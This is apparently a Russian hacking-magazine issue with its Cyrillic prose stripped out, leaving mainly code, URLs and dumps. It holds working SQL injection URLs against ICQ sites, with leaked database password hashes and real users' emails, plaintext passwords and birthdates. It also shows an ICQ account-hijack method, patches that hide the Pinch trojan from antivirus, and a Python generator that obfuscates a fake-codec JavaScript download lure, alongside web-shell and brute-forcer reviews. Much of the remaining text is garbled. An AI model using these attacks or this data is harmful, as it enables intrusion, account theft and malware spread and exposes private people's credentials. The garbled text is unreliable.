Referer XFF.
. :
MySQL Error = You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near
'"')' at line 1
SQL = INSERT INTO oops_sessions (ID,UID,START,LAST,I
PS,PAGES,PAGE,DATA,REFFER) VALUES ('dpdu7rh90ehfsc62
','0',1238958331,1238958331,'xxx.xxx.xxx.xxx',1,'/',
'a:1:{s:8:"USERNAME";s:10:"";}','SQL-Inj'here')
cx75planet.ru. User-Agent XFF. IPB
. ,
SQL-, -
, ..
:).
PHP, SQL-
. , , ,
. -
GET, POST Cookie. ,
, .
,
request, :
$headers = array (
'User-Agent: Babytoy/0.5',
'Referer: http://refrefref.ref/omg.pl'
);
$html = request_socket('http://127.0.0.1/showmeheaders.php', $headers);
echo $html;
PHP
( DVD):
. :
$packet = "GET {$url} HTTP/1.1\r\n"
. "Host: {$host}\r\n"
. implode("\r\n", $headers) . "\r\n"
. "Connection: Close\r\n\r\n";
- file_get_contents()
:
$opts = array (
'http' => array (
'header' => implode("\r\n", $headers) . "\r\n"
)
);
$context = stream_context_create($opts);
return file_get_contents($url, false, $context);
Curl
curl: -
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
, .
JavaScript, Flash,
. NoScript
AdBlock. ,
, . ! z
The Proxomitron. Tamper Data
Tamper Data
M4 g icq 884888, http://snipper.ru
Changes-
icq.com- 2010 .
-
.
, https://icq.com/password, ,
UIN ,
. , email'-
. ICQ , primary email
, email for login.
-
, ,
.
: ,
,
! ,
.
:
1.;
2. /-
;
3.,
, ;4.
.
.
, -.
, email for login -
, ,
,
, .
:
/
, . ,
, -,
:).
, -
555555558
. ,
https://icq.com/register
,
,
.
,
ICQ.com (-
) search.icq.com (
mail.ru), ,
http://www.icq.com/wit/
:).
-
-icq.
com.
2010 ICQ IM DST AOL. 187 . , .
ICQ:, , ICQ
DST
AOL
,
ICQ.
:
1.https://icq.com/password,
;
2.
click here;
3. ,
click here -
:
: https://www.icq.com/password/form/
web?form_type=qna&id=1&sn=XXX&show=1
: https://www.icq.com/password/form/
web?form_type=qna&id=2&sn=XXX&show=1
-
,
mail@partner_icq.com. ,
-
.
, -
2010 . -
() -
.
.
, ICQ
:
1. ABV.bg ICQ;
2.
Bigmir.Net;
3.-
,
;
4. Yandex ICQ;
5.
Atlas.sk, MyNet.com, Nana.co.il
.
ICQ.com-
(https://forum.antichat.ru/showthread.php?p=626441) SQL-
greetings.icq.com, , , ,
-
SYBASE ASE 15.0.1. :).
DST ( Mail.ru group -
) - ICQ.com
msgboard , 5.1.45-log )!
(
blogs.icq.com) 17 2010 -
S00pY Snipper.Ru.
,
(-
).
:
http://blogs.icq.com/blogs/blog/
tag/406428869-99999+union+select+1,concat(us
er,0x3a,password),3+from+mysql.user--+
mysql.
user:
localhost:root:*B3A0E433E7AD0F00794196F3C293
1CD66AA89796
%:msgboard_u_rw:*7FBD912E113CF606E410F18C967
487CE935ACFAC
%:scout:*9FD2B52556065163308826C11DD588A6F3
F2ED9E
%:repl:*90414724CBFFFE7B4880631D5E9E7232
C4737680
%:mydbm:*A9C391720DC3B218CD5EFEDFEDB8C55602
EFE2FE
%.aol.com:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
localhost:dstdbm:*4D93DC0E9E6FC017216D7DE4B4
9BC77BEE4E9EDE
%:ping:*75E75A54E1CF941C40965FD3C39B1937910
2B07B
%:argus:*F5A7D854E9C46784C82EFC0DAE973F6170
3A7224
%:nocdba:*2D48BF42A42234DBBCADDFA0F94C9ED46
0BD1567
%:repcheck:*B58082AC1A96B8580F828E2C730A4E9
1A26DE3B0
%:msgboard_u_ro:*F1D9E0F8627E5AD39CF98BFC58E
344CF4CCACAB4
localhost:repcheck:*B58082AC1A96B8580F828E2C
730A4E91A26DE3B0
icqwebmsdb-d05.db.aol.com:repcheck:*B58082AC
1A96B8580F828E2C730A4E91A26DE3B0
links
http://forum.asechka.ru . http://www.icq.com/en.html ICQ.com. http://snipper.ru/view/23/sql-inekciya-na-blogsicqcom/
SQL- blogs.icq.com. http://snip-per.ru/view/27/vozvrashhenie-ugnannogo-nomera-icq/ ICQ. http://www.rns-pdf.londonstock-exchange.com/rns/7389V_-2010-11-5.pdf - DST IPO. http://russia.blog.nimbuzz.com/2010/11/09/icq-ne-rabotaet-v-nimbuzz/ ICQ Nimbuzz.
HTTP://WWW
ICQ ABV.bg
SQL- blogs.icq.com
msgboard.lsps_tb, (Basic distribution
ID QIP')
ICQ.com, GameLand
ICQ tv :).
...
21;Walla
22;HP
23;Prosieben Austria
24;Jetix
25;Rambler Generic
26;Bigmir Belarus
27;Centrum CZ
28;GameLand
29;SUP
30;Puls4
31;Centrum SK
32;Yandex
...
, -
,
blogs.icq.com -
, , SQL-
:).
2010 ICQ-, -
, blogs.icq.com
-
.
:). SQL--
:
http://www.icq.com/greetings/cards/-1111+union+select
+1,concat(user(),0x3a,version(),0x3a,database()),3,4,
5,6,7+from+mysql.user+limit+0,1+--/send/
---
:
http://greetings.icq.com/greetings/cards/-253 union
select null,@@version,null,null,null,null,null,null
,1,null,null,null,null,null,null,null,null,null,nul
l--/
, blogs.icq.com,
.
,
registration_temp, :
regstr_id
regstr_origin
regstr_fname
regstr_lname
regstr_email
regstr_password
regstr_bdate
regstr_question
regstr_answer
regstr_nickname
regstr_lsp
regstr_reg_date
, , , -
icq.com/register-
! ,
, , -
! ,
, :
1.;
2. registration_temp;
3.-
.
:
greetings/cards/-1111+union+select+1,concat(regstr_
id,0x3a,regstr_origin,0x3a,regstr_fname,0x3a,regstr_
lname,0x3a,regstr_email,0x3a,regstr_
password,0x3a,regstr_bdate,0x3a,regstr_
question,0x3a,regstr_answer,0x3a,regstr_
nickname,0x3a,regstr_lsp,0x3a,regstr_reg_date),3,4,5,
6,7+from+registration_temp+limit+'.($count-1).',1+--/
send/');
$log = preg_replace('@.+id="card_title"
value="([^"]+)".+@is','$1',$a);
logger($log);
}
?>
-
, , ,
:). :
12495211:1:Samira.:x3:dadidux33@web.
de:pudding2:1992-12-04 00:00:00:::Samira. x3:0:2010-
11-15 12:30:53
12495219:1:Ivo:Geckovski:sfors_ivo@abv.
bg:a1b2c3d4:1985-03-27 00:00:00:::Ivo
Geckovski:0:2010-11-15 12:30:55
12495225:1:Madlen:Schwarz:Madlenschwarz85@
web.de:bier85:1985-02-05 00:00:00:::Madlen
Schwarz:1006:2010-11-15 12:30:58
12495235:0:Di:Karnavala:di_posh@nxt.
ru:345562iv:1987-04-24 00:00:00:::Di
Karnavala:-2:2010-11-15 12:31:00
12495247:1:Hellow:Kitty:kiska999-85@yandex.
ru:389162aa:1985-05-12 00:00:00:::Hellow
Kitty:3:2010-11-15 12:31:03
- ICQ.com.
https://www.icq.com/register/email_attach.php
(https://www.icq.com/
karma/login_page.php).
, - ICQ.com
, ,
,
-.
,
:). .
, :
, , -
http://www.icq.com/people//edit/ (
https://www.icq.com/register/email_attach.php ),
;
, , -
. -
https://www.icq.com/register/email_attach.php .
-
--
, -
html- :).
, ( ICQ.com):
1. html-:
2.;
3. -
email for login;
4.
https://icq.com/password :).
,
.
,
ICQ .
-,
ICQ,
.
, -
, ,
, -
. .
:).z
ICQ.com
Yandex ICQ
. icq.com/wit
"Cr@wler" [email protected]
, , -
. -, -
Pinch (
, -).
,
-
(, ,
RAR- DVD).
-
VMWare Windows XP (
, -
).
, OllyDbg, WinHex, PE- LordPE. , ,
virustotal.com . , ,
, .
,
,
, malware-. , .
. -
. , .
!
.
. , -
XOR , ,
! ,
(pinch.exe) .
13147810. 13147C26
,
. -
. , :
13147C30 PUSHAD
13147C31 MOV ECX,6C2F
13147C36 MOV EDX,DWORD PTR DS:[ECX+13141000]
13147C3C XOR EDX,76
13147C3F MOV DWORD PTR DS:[ECX+13141000],EDX
13147C45 LOOPD SHORT pinch_pa.13147C36
13147C47 POPAD
13147C48 JMP SHORT pinch_pa.13147810
(,
copy to executable-all modifications,
Save file). , -
, LordPE,
( OEP 13147C30,
) . ;
OllyDbg, ,
(
13147C48 , Shift+F9). ,
6C2F . -
. ! -
. virustotal.com,
. , 31
43 (-
42 43)! .
. -
, . , -
,
(--
,
2009 ).
13147C4B XOR EAX,EAX
13147C4D PUSH pinch_pa.13147C62
13147C52 PUSH DWORD PTR FS:[EAX]
13147C55 MOV DWORD PTR FS:[EAX],ESP ; FS:[0]
13147C58 CALL pinch_pa.13147C58
13147C5D JMP pinch_pa.13145555
13147C62 POP EAX
13147C63 POP EAX
13147C64 POP ESP
13147C65 JMP pinch_pa.13147810
:
13147C62. ,
, ,
13147C58
(JMP pinch_pa.13145555),
. , -
, ,
. ,
( 27 43
).
, -
?
.
, , ,
,
. ,
,
. ,
, -
!
,
, (
). 13147C90 , ,
(4Ch ,
13147C30). ,
. ,
OllyDbg , OEP
,
.
13147C90 - NEW OEP
length of code 4c
13147c30 - start of code
13147c7c - end of code
13147C90 60 PUSHAD
13147C91 B9 4C000000 MOV ECX,4C
13147C96 8B91 307C1413 MOV EDX,DWORD PTR DS:[ECX+13147C30]
13147C9C 83F2 54 XOR EDX,54
13147C9F 8991 307C1413 MOV DWORD PTR DS:[ECX+13147C30],EDX
13147CA5 ^E2 EF LOOPD SHORT kadabra_.13147C96
13147CA7 61 POPAD
jmp 13147c30
,
, .
. , -
, PE-, -
ImageBase,
. -
. WinHex -
, : 4D 5A 00 00 (-,
MZ,
PE-!). PE- (
13140000h),
:
13140000 4D DEC EBP
13140001 5A POP EDX
13140002 0000 ADD BYTE PTR DS:[EAX],AL
13140004 0100 ADD DWORD PTR DS:[EAX],EAX
...
13140028 0000 ADD BYTE PTR DS:[EAX],AL
, . , -
,
MZ-,
, . ,
. 13140028.
. -
, ! ,
: , 13140002,
:
13140002 EB 24 JMP SHORT 13140028
, 13140028, :
13140028 -E9 637C0000 JMP 13147c90
-
, LordPE
EntryPoint. , , :
25 43 -
., ,
.conf .data ,
-
. .
,
OllyDbg , ,
! , -
, image base.
Image base , ,
.
Lost in Time, Dr. Web,
: , 15-.
, ,
15000 , . , -
--
,
. , ,
-
, API-,
. -
? .
,
. ,
, . ,
. -
,
. ,
, API- GetLocalTime, -
, -
. , callback-
-
.
, TLS (Thread Local Storage)-callback- (, TLS ,
),
, , -
. Callback-
, OEP.
,
, ,
PE-.
TLS-
( callback-).
, , .
.
(13147d80 13147d90), -
.text, .
DWORD , , ,
callback- (13147d96),
callback- (13147da0).
TLS-: 80 7d 14 13 90 7d 14 13 96 7d 14 13 a0 7d 14 13. 13147d5d
( -
).
TLS-.
13147da0, 6 ,
Binary Edit. - 13 14 7d b0 00 00. 4
callback-.
callback-.
13147db0 ,
, :
13147DB0 PUSHAD
13147DB1 MOV ECX,6D2F
13147DB6 MOV DH,BYTE PTR DS:[ECX+13141000]
13147DBC XOR DH,CL
13147DBE MOV BYTE PTR DS:[ECX+13141000],DH
13147DC4 LOOPD SHORT 13147DB6
13147DC6 POPAD
13147DC7 RETN
, , -
, ,
-
OllyDbg.
TLS-
PE-. LordPE -
TLS Address 00005d7d (,
OllyDbg). ,
TLS,
callback-, OllyDbg Alt+O ,
,
, System Breakpoint (
, TLS callback-
!).
virustotal.com.
18 43 -
! , -
,
DrWeb, Panda, NOD32, TrendMicro-HouseCall, VBA32, ViRobot,
VirusBuster, Sunbelt 7048, F-Secure, BitDefender, eSafe .
. , -
.
! z
| "abcd..."
+----+--------
+----+--------+
|0004|25XX25XX|
+----+--------+
| "%n%n" |
+----+--------+
+----++
|0000||
+----++
| "" |
+----++
, , , ,
... ,
-
(0xFFFF -1)
memcpy, -
, .
char buffer[32000];
short int length = getLen(filename, offset); // length = -1 ~ 0xFFFF
if(length
blackhat.com/presentations/bh-usa-06/BH-US-06-Embleton.pdf.
In-Memory Fuzzing, .
?
. , ,
, -
,
.
. ,
; , ,
, (, -
,
..).
, accept,
recv, . CorelanSecurity Team,
redmine.corelan.be:8800/projects/inmemoryfuzzing/files.
, Pydasm (therning.org/magnus/archives/278) Paimei (openrce.org/downloads/details/208/PaiMei).
, Immunity Debugger (debugger.immunityinc.com/register.html ). ,
,
) with pvefindaddr.py (redmine.corelan.be:8800/projects/pvefindaddr). , ,
:
1. ;
2. pvefindaddr, PyCommand ();
3. pydasm 2.5;
4. , , installers, -;
5. pydasm Python25\Lib\site-packages\pydbg\pydasm.pyd.
PyDbg 2.5. -
-. , ,
,
. ,
-.
, -
.
.
void func1(char* input)
{
    char buffer[255];
    unsigned int len = strlen(input);
    if(len
(00401070) .
, strcpy ,
. ,
. -
(,
, ,
). , (vuln.exe
/GS), security cookie
,
, .
::
3*10^6 5*10^3 , 1-3 ;
1*10^6 15*10^3 -, 6-10 ;
:
1*10^5 150 , 0-3 ;
1*10^4 150 , 0-1 .
,
:
http://sites.google.com/site/felipeandresmanzano. ,
.
,
. .
Sulley peach.. , FTP 329
, -
. ,
.
hotfuzz (hotfuzz.atteq.com).
,
. Hotfuzz peach .
.
, ,
, , -
,
tm_export, tshark (
wireshark). , ,
, .
, , ... !
-
,
peach ( DVD).
!
. , , ,
winappdbg.
.
, -
winappdbg .
: avalanche klee avalanche (http://code.google.com/p/avalanche/):
.
Avalanche
(). , -
.
, . Avalanche
,
stp valgrind (
). :
$ wget http://avalanche.googlecode.com/files/avalanche-0.2.tar.gz
$ tar -xvf avalanche-0.2.tar.gz
$ cd avalanche-0.2
$ ./configure --prefix=`pwd`/inst
$ make
$ make install
:
$ ./inst/bin/avalanche --filename=samples/simple/seed --debug samples/simple/sample2 samples/simple/seed
Avalanche,
avalanche ? -
[Figure: Hotfuzz architecture. Panels: Peach in the middle (data matching, custom publisher, custom fuzzing strategies: random and data-type-based, TCP support, UDP support, proxy, recording); Data analysis (packet dissection with Wireshark libraries, packet reconstruction, finding relations, string tokenization, data type correction, filling in missing data, transformation into Peach structures, Peach structures creation, XML manipulators, transforming C-structures into Python-structures); Monitor (customized Windows debug engine, process monitor, GUI communicator, netstat-based port scanning, recorded data aggregation, additional data analysis, viewing crash details); Graphical User Interface (main window, dialogs, process handling, storing application settings, configuration file generation).]
winappdbg
[1] Dorothy E. Denning and Peter J. Denning. Certification of programs for secure information flow. Communications of the ACM, 1977.
[2] Dorothy E. Denning. A lattice model for secure information flow. Communications of the ACM, 1976.
[3] James Clause, Wanchun Li, and Alessandro Orso. Dytan: A generic dynamic taint analysis framework. Georgia Institute of Technology.
[4] Jim Chow, Tal Garfinkel, Kevin Christopher, Mendel Rosenblum. Understanding data lifetime via whole system emulation. USENIX, Stanford University.
[5] Feng Qin, Ho-seop Kim, Yuanyuan Zhou, Youfeng Wu. LIFT: A Low-Overhead Practical Information Flow Tracking System for Detecting Security Attacks. University of Illinois at Urbana-Champaign.
winappdbg.sourceforge.net/Tools.html . www.fuzzing.org.
avalanche ,
.
, ,
-
,
. -
:
(tainted) ,
(, , -..),
. -
(-
, ,
). ,
,
, -
,
, . Avalanche
Valgrind
(solver/) STP. Avalanche
: () Valgrind
Tracegrind Covgrind,
STP . Tracegrind
-
. -
STP -
. -, STP
(-
), .
,
-
.
. ,
STP
.
-
,
, .
-
(
, -
Valgrind).
Covgrind,
. Covgrind -, Tracegrind,
.
: Avalanche -
,
,
. (tainted
analysis[2-5]), , , -
,
.
STP STP bitvector (-
) . , , -
(loop). ,
,
(loop) (control flow graph). -
:
groups.csail.mit.edu/pag/daikon;
http://research.microsoft.com/en-us/um/people/sumitg/pubs/vmcai09_cons.pdf;
groups.csail.mit.edu/pag/pubs/annotation-study-fse2002-abstract.html.
Avalanche , -
. KLEE
(klee.llvm.org).
. z
, CISS Research Team http://twitter.com/NTarakanov
5 . 32- - 64- linux
2007 CVE-2007-4573 (bit.ly/CVE-2007-4573). cliph,
Wojciech Purczynski (, ?).
, 64-
linux, -
32-. (
arch/x86_64/ia32/ia32entry.S), 32-
64-:
sysenter_do_call:
cmpl $(IA32_NR_syscalls-1),%eax
+ .endm
24 2008
, :).
- movl \offset+72(%rsp),%eax
.endm
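Review bot: dropping `movl \offset+72(%rsp),%eax` from the macro also drops the implicit zero-extension into %rax that a 32-bit move performs; with the syscall-number bounds check at sysenter_do_call still a 32-bit `cmpl $(IA32_NR_syscalls-1),%eax`, the upper 32 bits of %rax are no longer cleared before the full register is used, which is the regression the surrounding text dates to 2008 and later connects to Ben Hawkes' 2010 report. If the reload is removed for the restart case, the zero-extension should be kept explicitly (or the compare widened to %rax) rather than lost as a side effect.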
2010 Ben Hawkes, -
,
eax. -
Ac1dB1tch3z. Ben
Hawkes' ;).
- cmpl $(IA32_NR_syscalls-1),%eax
+ cmpq $(IA32_NR_syscalls-1),%rax
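Review bot: the substantive fix is the switch from `cmpl ... %eax` to `cmpq ... %rax`; the 32-bit compare validated only the low half of the register, so a value that passed the bounds check could still be used as a full 64-bit index afterwards. The one-line change is the right minimal fix, but the review should confirm it is applied at every place in the file where the syscall number is compared with `cmpl` (the page shows only the sysenter_do_call instance), since an entry path left with the 32-bit compare would keep the same problem.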
trap frame. Tavis Ormandy -
!
. -
. NTVMD-,
csrss API-
,
.
. CPL (Current Privilege Level)
cs
ss, ,
Virtual-8086.
x86 , ,
16 , 20-. : (cs
icq 884888, http://snipper.ru
:Steam`O Brute:Windows 2000/XP/2003Server/Vista/2008 Server/7: INSIDER
-
,-
steam-.:
(http, socks 4/5);
;
;
good;
error
( , -
).
:
1.
txt- (
login;pass, proxy:port);
2.;
3.-
START.
,
-
,,
.
:Mikstura: *nix/win: Dr.TRO
-php-.
:
;
-
, data:, php://
input;
data: php://input,
;
-
-
;
, -
, full path,
( 15
"../");
( );
HTTP- -
perl-
LWP::Protocol::socks.
.
http://forum.inattack.ru/Mikstura-Mini-utilita-Dlja-Raboty-S-Inkludami-t23830.html.
: ITSecTeam Shell v2.1:*nix/win:Amin Shokohi(Pejvak)-
php-.
:).,
--
ITSecTeam Shell v2.1!
-
:
(66 );
;
-
;
-
;
MySQL, MSSQL,
PostgreSQL, Oracle & IBM DB2;
;
, PHP -
safe mode;
Windows;
;
;
-
zip -
;
;
-
( php);
;
-;
DoS;
sql/gzip-;
-
;
;
DDoS-;
;
symlink mod_security -
.htaccess;
;
php;
;
magic_quotes;
.
,
-
, :).
http://itsecteam.com/en/tools/itsecteam_shell.htm.
: ICQuinValuer
:Windows 2000/XP/2003Server/Vista/2008 Server/7:Dank & DeMerk &NightEagle
.
X-TOOLS
ICQ-
.
ICQ-
:
(viz/
inviz) ;
( ,
, , , -
, , ..);
-
;
;
;
;
;
.
-
,
:).
forum.asechka.ru/showthread.php?t=118542.
: Easteregger:Windows 2000/XP/2003Server/Vista/2008 Server/7: ,
.-
. Eastegger
:).
(),
.
,
,,, -
,
.
.
-
:
1. (, -
, -
);
2.-, , -
,.
,
Torrent. :
:WSO Krist_ALL edition:*nix/win:Krist_ALL-
-
WSO.Krist_ALL
,:
(
downloader', -
, , -
,
);
( writable,
);
-
,
(
INFO);
-
;
-
( -
);
;
INFO;
;
php-
,
php;
milw0rm;
;
$t
(1 ,
2 );
.
http://exploit.in/forum/index.php?showtopic=40939.
.
Help-About Torrent
( Torrent).
torrent -
.
T
(Tris).
P, .
, -
Eastegger',
:).
http://eastegger.com.
: PWGen: Windows 2000/XP/2003Server/Vista/2008 Server/7: Christian Thoeing-
.
PWGen,
-
. -
:
Free Open-Source;
AES SHA-2;
-
(
DLL',
Windows);
(
, ,
);
;
-
;
-
;
.
,
-
http://pwgen-win.sourceforge.net. *nix-
, -
http://pwgen.sourceforge.net.
ICQ-
WSO-
MALWARE [email protected]
/INTERNET SECURITY () Malware
. , , .
, X1.,USB-.
Microsoft SecurityEssentials:,,-,.:,,-64-.2.: KIS, Dr. Web, Nod32, Symantec..Avast.3., cloud-Symantec:,.,Symantec.
STEP , PC_ZONE DVD: Norton Internet
Security.
-
.Idle Mode
,
.
: --
?.,:).,-
.
Symantec-
,
.
,
.-
.
exe-, ,
-
?..,,
:
,-
, .
.
,-
,.
.
,,
.
,
1..,
.
(
),
--
:). IM-,
-
.
Dr.Web,-
,.
2. Dr.Web.-.Spyder-
,.
,
.
3. :).,-10KIS.
,,
.
KIS,
.
, X1.MicrosoftSecurity Essentials,,
-.
.
,
,
.-
,,.
2.-:,, AVG,Essentials. -
,-
,,,.
3.-,.
, , ,
:).
, ,.
,
, :
-
anti-malware.ru,,
- Deeoni$ , -
:).
, , :
1., . ?2., . , -
.
3., - . ?
, MALWARE1.: KIS2011Dr.Web
,vast!. KIS
(-,,
:)), Dr.Web-
,90-
OneHalf.
,,.
,-
:-,
-
-.
2.Avast!.,
-
.
,
,
,
: ,,
.
.
3.Comodo.-,
Internet Security
,-
.
:),.,
,,
,,
.
, UNIXOID1.
Eset Nod32.
, -Dr.Web
Cureit!
.
-
., :
- (
Win2k3r2) Kerio WinRoute Firewall
McAfee
;
(OpenBSD) Spamd
( greylisting) + Sendmail (-
) + Clamav + Procmail (-
,
Maildir);
(WinXP) Eset Nod32
+ Dr.Web Cureit! + Kaspersky Virus Removal
Tool + MalwareBytes Anti-malware + AVZ (
) + Dr.Web LiveCD (
) + Acronis True Image BootCD (
/).
2.
Nod32,
-
.
-.
3.
.
, ,
,
: , :
-
squid (
), havp clamav.-
-
: clamav, havp . Linux
.
.
DEEONI$, - X1. Avast Free Antivirus.
,,
.
.-
, -
.
2., .-,
-
.-,
, ,
.--
, :
,
..
Ok.
3.Avira
AntiVir.-
,,.-
BitDefender, -
- (
) .
,ANTI-MALWARE.RU
1.
Windows 7 x64,
,-
.
Microsoft
Security Essentials,-
Avast 5 Free Anti-virus.,
-,
.
2.-
.-
:-
,
,
.
, -
,
, Microsoft, AvastAvira.
,
,
Windows XP,
-
,Kaspersky
Internet Security, Norton Internet
SecurityBitDefender Internet
Security.3.,
-
.-
,
,-
,-
,
-
.
-
-
, Symantec
(Norton), Microsoft, AvastPanda.
-
-
,
,
,.-
Internet SecurityTotal
Security-
(-).
,(
)-
:,
,-
,,
.
-
,
,,
.
Norton 360 --,
,
.z
MALWARE presidentua http://tutamc.com
Python .
, . ?
! -
.
80
.
JavaScriptXOR.-
.
JavaScript
.
Internet Explorer,
.,
,,
.
-
JavaScript (,).
:).
,,
.,
,
,-
.
JavaScript.
,
.--
(,
, , ),.
,
.,
.
JS-
.
Internet Explorer.., - . :).
warning
WARNING
JavaScripta,
:
function go_codec()
{
location.href = "http://server/codec.exe";
}
var message = "You don't have codec for video";
alert(message);
setTimeout( go_codec(), 1000);
-.
hex-.Python-
,-
:
import random
from string import letters

def morf_html_string(html):
    # replace roughly a quarter of the letters with HTML numeric character references (&#NN;)
    rez = ''
    for s in html:
        if s in letters and random.choice([True, False, False, False]):
            rez += "&#%s;" % ord(s)
        else:
            rez += s
    return rez
, (in
letters), 25%hex--
.,aa.
You don't have codec for video-:
"You don't have codec
for video".
, -
.
,+
String.fromCharCode ():
var a = "co" + "de" + String.fromCharCode(69) + "c";
(
).
JavaScript, -
go_codec. ,
.-
, ,
., ,
,go_codec -SDdsdsW,
go_codec -
SDdsdsW.
:
class G(object):
    rand_var = {}
.
:
def rand_var(var):
    if var in G.rand_var:
        return G.rand_var[var]
    G.rand_var[var] = generate_string(5, 10)
    return G.rand_var[var]
;
, .
, 5
10 , -
.
, generate_
string!:
def generate_string(start=5, end=7):
    r = ''
    for _ in xrange(random.randrange(start, end)):
        r += random.choice(letters)
    return r
, , -
,.
-.
:
var b="aaa";
if ("aaaa"=="sdsdsd") asdasdas();
function sfsf(){};
-
get_el_, -:
, -
JavaScript
.
-
,
-
.
def get_el_1():
    return "var %s='%s';" % (
        generate_string(4,6),
        generate_string(4,6)
    )
(get_el_1, get_el_2, get_el_3):
def random_js_element():
    def get_el_1():
        return "var %s='%s';" % (
            generate_string(),
            generate_string()
        )
    def get_el_2():
        return "if ('%s'=='%s') %s();" % (
            generate_string(),
            generate_string(),
            generate_string()
        )
    def get_el_3():
        return "function %s(){}" % (
            generate_string())
    fnc = "get_el_%s" % random.randrange(1,4)
    return locals()[fnc]()
, .
,
locals().
, , -
:
>>> random_js_element()
'function aErfSA(){}'
>>> random_js_element()
"if ('uHsJi'=='YvEwVNttta') pxQdHssd();"
>>> random_js_element()
"var yrSfsdgS='OywZCvq';"
,
.
,-
..-
Template--TornadoWeb.
from tornado.template import Template
template_js = "our_example_template"
js = Template(template_js).generate(
    rand_var=rand_var,
    morf_html_string=morf_html_string,
    random_js_element=random_js_element
)
( template_js)-
JavaScript,-
( Template) .
JS .
Tornado-
. :
{{ random_js_element() }}
function {{ rand_var("go_codec") }}(){
location.href = "{{ morf_html_string("http://server/codec.exe") }}";
}
var {{ rand_var("message") }} = "{{ morf_html_string("You don't have codec for video") }}";
alert({{ rand_var("message") }});
setTimeout( {{ rand_var("go_codec") }}(), 1000);
{{ random_js_element() }}
Python's random: randrange, choice. , start stop:
random.randrange(start, stop)
. , -. , - 33%:
if random.choice([True, False, False]):
    print "33.33333%"
string :
from string import letters
>>> letters
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
letters (), ascii_letters -.
JavaScript. , .
, , JavaScript:
{{ }}
var a = "{{ (" ") }}"
, , -.
, .
,
{{ random_js_element() }}
(). , -
rand_var - {{
rand_var("go_codec") }}.
{{ morf_html_string("http://server/codec.
exe") }}.
, -
.
JavaScript-:
def many_random_js(start=0, stop=5):
    rez = ""
    for _ in xrange(random.randrange(start, stop)):
        rez += random_js_element()
    return rez
{{ many_random_js() }}.
.:
,,
.,
, JavaScript--
., ,.
, ,
?-
.
,
..
PS: , -
,!
(-, ,
,-
, .) :).z
, 2 Python. , collections defaultdict, - rand_var. defaultdict . :
>>> a = defaultdict(generate_string)
>>> a["go_codec"]
dqQSfw
>>> a["location"]
EdstEf
>>> a["go_codec"]
dqQSfw
HTTP://WWW links:
http://developer.yahoo.com/yui/compressor/
http://code.google.com/closure/compiler/
http://jscrambler.com/
http://javascriptobfuscator.com/
http://www.stunnix.com/prod/jo/
http://www.crockford.com/javascript/jsmin.html
http://www.daftlogic.com/projects-online-javascript-obfuscator.htm
TornadoWeb: http://www.tornadoweb.org/
IDE Python PyCharm .
- :)
-, ,
:
location.href = "http://codec/codec.exe";
:
var a = location;
a.href = "http://codec/codec.exe";
a["h"+"ref"] = "http://codec/codec.exe";
, :
var {{ rand_var("location") }} = location;
{{ rand_var("location") }}["{{ morf_html_
string("href") }} "] = "{{ morf_html_
string("http://codec/codec.exe") }}";
MALWARE
TO-5
2010
, ESET, www.twitter.com/matrosov
, . ,
, . 2010 , .
Stuxnet -
. , Stuxnet
,
.
-
. , .
Stuxnet ()
. -
HIPS-,
-
. , , -
, Realtek JMicron.
Microsoft,
, -
. ? -
MS! , -
MS ,
. ,
, , -
.
.
, Stuxnet -
-
.
-,
-
, , -
, .
0-day
,
-
. -
MS10-046,
, -
LNK/PIF-.
,
. ,
,
-
.
:
MS10-061 Print Spooler, . -
.
MS08-067 , , Conficker.
. ,
, -
, Conficker
.
, Stuxnet
. -
,
,
.
. : Win2000/XP Vista/Win7.
MS10-073 win32k.sys, - Win2000/XP -
.
,
[Figure: TDL3 hidden file system layout (tdl, config.ini, File table).]
. ,
Stuxnet . -
.
( Vendor-ID) (Task
Scheduler), - SYSTEM Vista/Win7/Win2008.
.
, ,
. ,
,
( PoC) Microsoft. , -,
:).
CVE-2010-2772, Siemens Simatic
WinCC PCS 7 SCADA, -
Lnk-, Stuxnet
Smartcard API !
TDL4 MBR
MS Internet Explorer ( Zeus)
, - TDL4
[Figure: Stuxnet propagation and installation vectors in MS Windows. Propagation: removable devices (MS10-046) and local network (MS08-067, MS10-061); privilege escalation: MS10-073 on Win2000/XP, MS10-0XX on Vista/Win7/Server 2008; general and additional attack vectors lead to installation.]
[Figure: TDL3 loading (PrintProcessor, IMAGE_FILE_DLL PE, AddPrintProcessor API, SeLoadDriver, DRIVER_SECTION chain: pci.sys, Driver1.sys, Driver2.sys, ..., DriverN.sys, Driver32k.sys).]
Microsoft SQL WinCC.
Stuxnet ,
:
-, -
Microsoft
Visual C++. , -
. ,
. -, : -
, .
,
,
.
P2P,
, -
, .
, Stuxnet,
. Stuxnet Under the Microscope
70 ,
-
:).
TDL4, -
64-,
. TDL4
TDL3,
. TDL4
64-
Windows.
,
ShellExecute
(DeletePrintProcessor)
API
MALWARE
MBR
. -
, Mebroot, StonedBoot . ,
, TDL3 -
-
, , 64-
, -
.
, :
(
\\??\PhysicalDrive0),C:;
( TDL3 );
MBR-,
;
x64--
WinAPI ExitWindowsEx()
ZwRaiseHardError().
:
BIOS
MBR.
TDL4;
-
, ldr16
;
ldr16 13h,. -
(x32
x64), , , ldr32 ldr64;
, ldr32 ldr64,
TDL4, -
API, ;
-
, .
IoCreateDriver()..
TDL4 ,
,
TDL3.
TDL3
,
, , ,
. -
, 3.273.
TDL3 2010 ,
( -
- MS :)) -
HIPS-.
TDL3.
HIPS- WinAPI- AddPrintProcessor
AddPrintProvidor,
HIPS-, Stuxnet
-
. , , , -
,
. , , -
, , ,
-
. TDL3 -
, -
.
BOOL AddPrintProcessor(
__in LPTSTR pName,
__in LPTSTR pEnvironment,
__in LPTSTR pPathName,
__in LPTSTR pPrintProcessorName
);
:
BOOL AddPrintProvidor(
__in LPTSTR pName,
__in DWORD Level,
__in LPBYTE pProviderInfo
);
TDL3 :
;
.
, -
, SE_LOAD_DRIVER_
PRIVILEGE, /.
, WinAPI-
RtlAdjustPrivilege.,
%PrintProcessor% -
AddPrintProcessor/
AddPrintProvidor, -
tdl. RPC-
().
TDL3
. ,
-
.
TDL3 .
-
,
, -
.
TDL3
, .
.
,
TDL3 (,
).
,
.
TDL3
. , -
,
, -
.
:
(tdlcmd.dll);
(config.ini);
(tdl);
(rsrc.dat);
.
, -
() -, TDL3 ,
.
tfd.
